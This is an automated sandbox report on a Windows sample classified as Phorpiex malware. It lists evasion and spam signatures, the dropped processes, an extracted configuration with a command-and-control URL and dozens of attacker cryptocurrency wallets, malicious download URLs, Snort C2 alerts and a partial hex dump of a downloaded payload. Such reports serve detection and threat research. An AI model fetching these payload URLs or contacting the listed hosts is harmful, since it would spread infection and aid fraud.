Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gEkl9O5tiu.exe

Overview

General Information

Sample Name:gEkl9O5tiu.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:2ea6c5e97869622dfe70d2b34daf564e
Analysis ID:1292729
MD5:2ea6c5e97869622dfe70d2b34daf564e
SHA1:45500603bf8093676b66f056924a71e04793827a
SHA256:5f28bba8bd23cdb5c8a3fa018727bcf365eaf31c06b7bc8d3f3097a85db037f3
Infos:

Detection

Phorpiex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Phorpiex
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Found evasive API chain (may stop execution after checking mutex)
Contains functionality to determine the online IP of the system
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
May check the online IP address of the machine
Contains functionality to modify clipboard data
Send many emails (e-Mail Spam)
Machine Learning detection for dropped file
Writes a notice file (html or txt) to demand a ransom
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Contains functionality to detect sleep reduction / modifications
Contains functionality to check if Internet connection is working
Uses 32bit PE files
Tries to disable installed Antivirus / HIPS / PFW
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Connects to many different domains
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evaded block containing many API calls
PE file contains more sections than normal
Found evasive API chain (may stop execution after accessing registry keys)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • gEkl9O5tiu.exe (PID: 1580 cmdline: C:\Users\user\Desktop\gEkl9O5tiu.exe MD5: 2EA6C5E97869622DFE70D2B34DAF564E)
    • 2550821914.exe (PID: 680 cmdline: C:\Users\user\AppData\Local\Temp\2550821914.exe MD5: 90CBEADCDA0AD6D4302C36AA9FD2A53C)
      • sysesvcmw.exe (PID: 1384 cmdline: C:\Windows\ sysesvcmw.exe MD5: 90CBEADCDA0AD6D4302C36AA9FD2A53C)
        • 1925824589.exe (PID: 1708 cmdline: C:\Users\user\AppData\Local\Temp\1925824589.exe MD5: 4F74BC597A7FA3989EC09EEFA2A3D00A)
        • 150623101.exe (PID: 956 cmdline: C:\Users\user\AppData\Local\Temp\150623101.exe MD5: 0D539E8277F20391A31BABFF8714FDB0)
          • 2465513676.exe (PID: 9636 cmdline: C:\Users\user\AppData\Local\Temp\2465513676.exe MD5: 41AB08C1955FCE44BFD0C76A64D1945A)
  • sysesvcmw.exe (PID: 1840 cmdline: "C:\Windows\ sysesvcmw.exe" MD5: 90CBEADCDA0AD6D4302C36AA9FD2A53C)
  • cleanup
{"C2 url": "http://185.215.113.66/", "Wallet": ["1Hw9tx4KyTq4oRoLVhPb4hjDJcLhEa4Tn6", "qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut", "XtxFdsKkRN3oVDXtN2ipcHeNi87basT2sL", "LXMNcn9D8FQKzGNLjdSyR9dEM8Rsh9NzyX", "rwn7tb5KQjXEjH42GgdHWHec5PPhVgqhSH", "hx7b6677c8f7049c2a6e9df0dfd422683c32e67709", "QiAmmfSSTe5fkaSLdp9mV4MDHfz27JBoVU", "RCZdkrikMCWrhBG9gNVmmE9yDcQxSUbqFd", "NDKNTURHWAMQHNHMOPJML5FKZZPQIRE4IZFSMEU2", "ARML6g7zynrwUHJbFJCCzMPiysUFXYBGgQ", "48jYpFT6bT8MTeph7VsyzCQeDsGHqdQNc2kUkRFJPzfRHHjarBvBtudPUtParMkDzZbYBrd3yntWBQcsnVBNeeMbN9EXifg", "SP1GK1GES8EXB6E15KQJ0EM169NQQNDZG8A2GDRZQ", "aCguZWA9zwz4Dk9zNyxdM96mzWnjLoxzYQ", "f1urg44xg2ziciji4akbxlkwb5y64msbmb7py5ury", "lsk5mjenfunkehcwu8mss9qd6emg3nrr78em82hwn", "zil1zucjet9qmgecmen2lm7n2pevu6pf8hg8vzgrl3", "erd1qvpwuwc2xue69enjtte7z3tekdclx9fc4769mlafc3vjt68hp5pq0s82xw", "kava14z663qgxvaq30dwdqepa6r94mhfnzww87nmz7f", "inj1s33ycsnpnh70ltzrcwvp7ahcpfwn7x9nnptsym", "osmo1nhtpu3gqq7d448u320xzkjk3j8f370v4f336xj", "3PL7YCa4akNYzuScqQwiSbtTP9q9E9PLreC", "3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3", "D9AJWrbYsidS9rAU146ifLRu1fzX9oQYSH", "DsjozoLCkxdeec5NNLTPx5zRS23UjUm7C7v", "t1gvVWHnjbGTsoWXEyoTFojc2GqEzBgvbEn", "terra1ax9ks6fmneqd997wgkdx35zntxfvswg0an2ym6", "tz1hG2rJaUJBkmwzMTw5KhzQdyPxqJAmu6k7", "bnb1cgttf7t5hu7ud3c436ufhcmy59qnkd09adqczd", "band1mgnt2v6n9x7pvfquj4ehguyhjytkjswql0uvhr", "bc1q0fusmmgycnhsd5cadsuz2hk8d4maausjfjypqg", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut", "cosmos1lc7xvs0tyl3u57vgn4nsw2kldmp84lrw75c9g4", "addr1q8m948qxhth60qzhag0d3kck7p0y5gqkvnct4w9zwqljcn0kt2wqdwh057q906s7mrd3duz7fgspve8sh2u2yupl93xsjzumrw", "nano_1m1r95bjgfgtahh3dcxeexuidpr6kr799pfuue4u9xczdkymo8rsaebc4ed4", "GAUCC7ZBSU2KJMHXOZD6AP5LOBGKNDPCDNRYP2CO2ACR63YCSUBNT5QE", "GU5ydEfPFXcUtEPqwcyX6AD7BkDAacHy4N", "EQA0PV0Evgs71IkPc8Ng0SrtM3ZZFK87K6B3SgR28VWP6rWT", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA"]}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\2550821914.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
    C:\Windows\ sysesvcmw.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newtpp[1].exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
        SourceRuleDescriptionAuthorStrings
        00000006.00000000.399820477.0000000000410000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
          00000005.00000000.379469431.0000000000410000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
            00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
              00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                00000004.00000000.370252775.0000000000410000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                  Click to see the 5 entries
                  SourceRuleDescriptionAuthorStrings
                  4.0.2550821914.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                    6.2. sysesvcmw.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                      5.2. sysesvcmw.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                        4.2.2550821914.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                          5.0. sysesvcmw.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                            Click to see the 1 entries
                            No Sigma rule has matched
                            Timestamp:192.168.2.2231.58.71.10154823405002044077 08/17/23-14:33:03.293413
                            SID:2044077
                            Source Port:54823
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.22182.177.175.24154823405002044077 08/17/23-14:32:48.270504
                            SID:2044077
                            Source Port:54823
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.22188.213.181.16354823405002044077 08/17/23-14:33:08.309919
                            SID:2044077
                            Source Port:54823
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.22192.168.1.14554823405002044077 08/17/23-14:32:08.081550
                            SID:2044077
                            Source Port:54823
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.222.180.154.24354823405002044077 08/17/23-14:32:43.263228
                            SID:2044077
                            Source Port:54823
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.2291.98.7.4254823405002044077 08/17/23-14:32:53.279443
                            SID:2044077
                            Source Port:54823
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.222.180.17.9154823405002044077 08/17/23-14:32:23.198989
                            SID:2044077
                            Source Port:54823
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.22185.177.0.20154823405002044077 08/17/23-14:32:13.184875
                            SID:2044077
                            Source Port:54823
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.222.185.229.6854823405002044077 08/17/23-14:32:18.190445
                            SID:2044077
                            Source Port:54823
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.222.176.69.25054823405002044077 08/17/23-14:32:38.244092
                            SID:2044077
                            Source Port:54823
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.22178.236.111.15654823405002044077 08/17/23-14:32:33.222711
                            SID:2044077
                            Source Port:54823
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.2259.91.192.11754823405002044077 08/17/23-14:32:03.067553
                            SID:2044077
                            Source Port:54823
                            Destination Port:40500
                            Protocol:UDP
                            Classtype:A Network Trojan was detected

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: 4.0.2550821914.exe.400000.0.unpackMalware Configuration Extractor: Phorpiex {"C2 url": "http://185.215.113.66/", "Wallet": ["1Hw9tx4KyTq4oRoLVhPb4hjDJcLhEa4Tn6", "qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut", "XtxFdsKkRN3oVDXtN2ipcHeNi87basT2sL", "LXMNcn9D8FQKzGNLjdSyR9dEM8Rsh9NzyX", "rwn7tb5KQjXEjH42GgdHWHec5PPhVgqhSH", "hx7b6677c8f7049c2a6e9df0dfd422683c32e67709", "QiAmmfSSTe5fkaSLdp9mV4MDHfz27JBoVU", "RCZdkrikMCWrhBG9gNVmmE9yDcQxSUbqFd", "NDKNTURHWAMQHNHMOPJML5FKZZPQIRE4IZFSMEU2", "ARML6g7zynrwUHJbFJCCzMPiysUFXYBGgQ", "48jYpFT6bT8MTeph7VsyzCQeDsGHqdQNc2kUkRFJPzfRHHjarBvBtudPUtParMkDzZbYBrd3yntWBQcsnVBNeeMbN9EXifg", "SP1GK1GES8EXB6E15KQJ0EM169NQQNDZG8A2GDRZQ", "aCguZWA9zwz4Dk9zNyxdM96mzWnjLoxzYQ", "f1urg44xg2ziciji4akbxlkwb5y64msbmb7py5ury", "lsk5mjenfunkehcwu8mss9qd6emg3nrr78em82hwn", "zil1zucjet9qmgecmen2lm7n2pevu6pf8hg8vzgrl3", "erd1qvpwuwc2xue69enjtte7z3tekdclx9fc4769mlafc3vjt68hp5pq0s82xw", "kava14z663qgxvaq30dwdqepa6r94mhfnzww87nmz7f", "inj1s33ycsnpnh70ltzrcwvp7ahcpfwn7x9nnptsym", "osmo1nhtpu3gqq7d448u320xzkjk3j8f370v4f336xj", "3PL7YCa4akNYzuScqQwiSbtTP9q9E9PLreC", "3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3", "D9AJWrbYsidS9rAU146ifLRu1fzX9oQYSH", "DsjozoLCkxdeec5NNLTPx5zRS23UjUm7C7v", "t1gvVWHnjbGTsoWXEyoTFojc2GqEzBgvbEn", "terra1ax9ks6fmneqd997wgkdx35zntxfvswg0an2ym6", "tz1hG2rJaUJBkmwzMTw5KhzQdyPxqJAmu6k7", "bnb1cgttf7t5hu7ud3c436ufhcmy59qnkd09adqczd", "band1mgnt2v6n9x7pvfquj4ehguyhjytkjswql0uvhr", "bc1q0fusmmgycnhsd5cadsuz2hk8d4maausjfjypqg", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut", "cosmos1lc7xvs0tyl3u57vgn4nsw2kldmp84lrw75c9g4", "addr1q8m948qxhth60qzhag0d3kck7p0y5gqkvnct4w9zwqljcn0kt2wqdwh057q906s7mrd3duz7fgspve8sh2u2yupl93xsjzumrw", "nano_1m1r95bjgfgtahh3dcxeexuidpr6kr799pfuue4u9xczdkymo8rsaebc4ed4", "GAUCC7ZBSU2KJMHXOZD6AP5LOBGKNDPCDNRYP2CO2ACR63YCSUBNT5QE", "GU5ydEfPFXcUtEPqwcyX6AD7BkDAacHy4N", "EQA0PV0Evgs71IkPc8Ng0SrtM3ZZFK87K6B3SgR28VWP6rWT", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA"]}
                            Source: gEkl9O5tiu.exeReversingLabs: Detection: 47%
                            Source: gEkl9O5tiu.exeVirustotal: Detection: 57%Perma Link
                            Source: http://185.215.113.66/from/n.txtAvira URL Cloud: Label: malware
                            Source: Http://185.215.113.66/5Avira URL Cloud: Label: malware
                            Source: http://185.215.113.66/from/706.txtnAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/getxmrAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/from/Avira URL Cloud: Label: malware
                            Source: http://185.215.113.66/1bbC:Avira URL Cloud: Label: malware
                            Source: http://185.215.113.66/from/http://185.215.113.66/from/n.txtBAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/getxmr%Avira URL Cloud: Label: malware
                            Source: http://185.215.113.66/4Avira URL Cloud: Label: malware
                            Source: http://twizt.net/peinstall.php%temp%%sAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/1Avira URL Cloud: Label: malware
                            Source: http://185.215.113.66/1C:Avira URL Cloud: Label: malware
                            Source: http://185.215.113.66/2u9o0b7nAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/3Avira URL Cloud: Label: malware
                            Source: http://185.215.113.66/5GAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/2Avira URL Cloud: Label: malware
                            Source: http://twizt.net/peinstall.php;OAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/Avira URL Cloud: Label: malware
                            Source: http://185.215.113.66/from/n.txtzAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/nxmr.exeAvira URL Cloud: Label: malware
                            Source: http://twizt.net/newtpp.exeP0Avira URL Cloud: Label: malware
                            Source: http://twizt.net/newtpp.exeAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/from/HAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/from/TmlrAvira URL Cloud: Label: malware
                            Source: http://twizt.net/newtpp.exeVAvira URL Cloud: Label: malware
                            Source: http://twizt.net/peinstall.phpAvira URL Cloud: Label: malware
                            Source: http://185.215.113.66/from/706.txtAvira URL Cloud: Label: malware
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newtpp[1].exeReversingLabs: Detection: 86%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nxmr[1].exeReversingLabs: Detection: 90%
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeReversingLabs: Detection: 91%
                            Source: C:\Users\user\AppData\Local\Temp\2465513676.exeReversingLabs: Detection: 90%
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeReversingLabs: Detection: 86%
                            Source: C:\Windows\ sysesvcmw.exeReversingLabs: Detection: 86%
                            Source: gEkl9O5tiu.exeJoe Sandbox ML: detected
                            Source: C:\Windows\ sysesvcmw.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newtpp[1].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_0040A870 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,4_2_0040A870
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_0040A870 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,5_2_0040A870
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_0040A870 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,6_2_0040A870

                            Phishing

                            barindex
                            Source: Yara matchFile source: 4.0.2550821914.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2. sysesvcmw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2. sysesvcmw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.2550821914.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0. sysesvcmw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0. sysesvcmw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000000.399820477.0000000000410000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.379469431.0000000000410000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.370252775.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.381787142.00000000004D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 2550821914.exe PID: 680, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: sysesvcmw.exe PID: 1384, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: sysesvcmw.exe PID: 1840, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\2550821914.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\ sysesvcmw.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newtpp[1].exe, type: DROPPED
                            Source: gEkl9O5tiu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
                            Source: gEkl9O5tiu.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_00404E80 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00404E80
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_00404FC0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_00404FC0
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_00404E80 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00404E80
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_00404FC0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,5_2_00404FC0
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_00404E80 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00404E80
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_00404FC0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,6_2_00404FC0

                            Networking

                            barindex
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.22:54823 -> 59.91.192.117:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.22:54823 -> 192.168.1.145:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.22:54823 -> 185.177.0.201:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.22:54823 -> 2.185.229.68:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.22:54823 -> 2.180.17.91:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.22:54823 -> 178.236.111.156:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.22:54823 -> 2.176.69.250:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.22:54823 -> 2.180.154.243:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.22:54823 -> 182.177.175.241:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.22:54823 -> 91.98.7.42:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.22:54823 -> 31.58.71.101:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.22:54823 -> 188.213.181.163:40500
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeCode function: 9_2_00EA17D0 InternetOpenA,InternetOpenUrlA,InternetReadFile,wsprintfA,wsprintfA,InternetCloseHandle,wsprintfA,InternetCloseHandle, http://icanhazip.com/9_2_00EA17D0
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeDNS query: name: icanhazip.com
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeDNS query: name: icanhazip.com
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_00409540 htons,socket,connect,getsockname, www.update.microsoft.com4_2_00409540
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_00409540 htons,socket,connect,getsockname, www.update.microsoft.com5_2_00409540
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_00409540 htons,socket,connect,getsockname, www.update.microsoft.com6_2_00409540
                            Source: Joe Sandbox ViewIP Address: 104.47.18.161 104.47.18.161
                            Source: unknownNetwork traffic detected: DNS query count 484
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:31:44 GMTContent-Type: application/octet-streamContent-Length: 80896Last-Modified: Wed, 16 Aug 2023 14:20:16 GMTConnection: keep-aliveETag: "64dcdb20-13c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5d 62 31 f3 19 03 5f a0 19 03 5f a0 19 03 5f a0 61 71 5e a1 1b 03 5f a0 da 0c 02 a0 1b 03 5f a0 da 0c 00 a0 18 03 5f a0 da 0c 50 a0 1b 03 5f a0 3e c5 32 a0 1d 03 5f a0 19 03 5e a0 a1 03 5f a0 3e c5 24 a0 0c 03 5f a0 10 7b d6 a0 3e 03 5f a0 10 7b ce a0 18 03 5f a0 52 69 63 68 19 03 5f a0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a8 da dc 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e2 00 00 00 6a 00 00 00 00 00 00 10 5e 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 21 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 04 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5c e1 00 00 00 10 00 00 00 e2 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ac 30 00 00 00 00 01 00 00 32 00 00 00 e6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 36 00 00 00 40 01 00 00 24 00 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 